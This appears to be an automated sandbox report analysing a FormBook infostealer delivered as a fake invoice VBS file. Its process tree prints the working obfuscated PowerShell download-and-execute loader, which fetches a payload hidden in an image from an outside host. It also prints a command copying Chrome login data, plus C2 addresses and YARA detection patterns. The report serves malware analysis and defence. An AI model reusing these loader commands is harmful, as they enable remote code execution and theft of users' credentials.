Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Signed Proforma Invoice 3645479_pdf.vbs

Overview

General Information

Sample name:Signed Proforma Invoice 3645479_pdf.vbs
Analysis ID:1428347
MD5:9e049f3029a5a6df1ab5d77d1a934ce3
SHA1:a31e0f94e0ee4dba78bc8adc291e1035d48561bd
SHA256:0831fee0915f056e6ca78e9a83a2fe75260a197c0d64e7a200ab8ebfc3479536
Tags:vbs
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Creation with Colorcpl
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Browser Data Stealing
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6940 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHcDgTreQgBVDgTreGcDgTrecDgTreDgTre2DgTreHEDgTreeQBzDgTreEYDgTreNQDgTre4DgTreGkDgTreSgBBDgTreCEDgTrePQB5DgTreGUDgTreawBoDgTreHQDgTredQBhDgTreCYDgTreMgDgTrexDgTreDEDgTreMQDgTreyDgTreCUDgTreMDgTreDgTre4DgTreDEDgTreNgDgTre4DgTreEMDgTreMwBDDgTreDQDgTreRgDgTrezDgTreDYDgTreRgDgTre2DgTreEUDgTreNDgTreDgTre9DgTreGQDgTreaQBzDgTreGUDgTrecgDgTre/DgTreGQDgTreYQBvDgTreGwDgTrebgB3DgTreG8DgTreZDgTreDgTrevDgTreG0DgTrebwBjDgTreC4DgTreZQB2DgTreGkDgTrebDgTreDgTreuDgTreGUDgTredgBpDgTreHIDgTreZDgTreBlDgTreG4DgTrebwDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreTQBTDgTreEIDgTredQBpDgTreGwDgTreZDgTreDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MSBuild.exe (PID: 7032 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 7004 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
            • colorcpl.exe (PID: 4584 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
              • cmd.exe (PID: 1704 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • firefox.exe (PID: 1748 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lunazone.us/m07a/"], "decoy": ["shakishaskakes.com", "com222.shop", "thailand-package.in", "apexu.xyz", "xlmagnemite.com", "nagapura.com", "auralights.store", "springupfashionsalon.com", "ecoessentiaer.shop", "myorra.com", "xasvcd.xyz", "zachbynesdesigns.art", "qdaoxingsujiao.com", "workproapi.site", "pbmengineering.com", "cioccasubaruspecials.com", "tmotest.com", "yipaijihejiaoyu.com", "msaway.com", "jfn3d.cc", "potentpolitics.com", "gumuszemin.com", "elimmedcentre.com", "tveuropetravel.com", "cryptoshipping-cargo.site", "123b.bingo", "auspilifepharma.com", "nacob.top", "cnexam.net", "royal-buttons.com", "stanleywarner.autos", "s1mple-giveaways.com", "cairns.care", "slimshakeshop.online", "speakgeni.us", "qnttlw.com", "kitty-fit.com", "recordlabeltime.com", "balancceer.top", "cerkust.info", "cursosead.pro", "ukrfilmtrest.com", "rewardraptor.net", "welqi.com", "chronotypecolab.com", "loj-wroie.com", "lauracecilia.com", "luminouscar.info", "theschoolofbooks.shop", "manjuc.xyz", "successchasersltd.com", "matchuplover.com", "proomtb.com", "rankrise.shop", "theiceden.co", "adeptetho.com", "myshup.net", "bet7839.com", "propertiesfinance.com", "izii.online", "herb.boutique", "nobook.xyz", "yucampos.co", "liabillityinsurance.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 22 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.MSBuild.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.MSBuild.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.MSBuild.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          5.2.MSBuild.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.MSBuild.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a39:$sqlite3step: 68 34 1C 7B E1
          • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a68:$sqlite3text: 68 38 2A 90 C5
          • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_3492.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

            Sigma Signatures

            Spreading

            barindex
            Sigma detected: Powershell download payload from hardcoded c2 list
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] 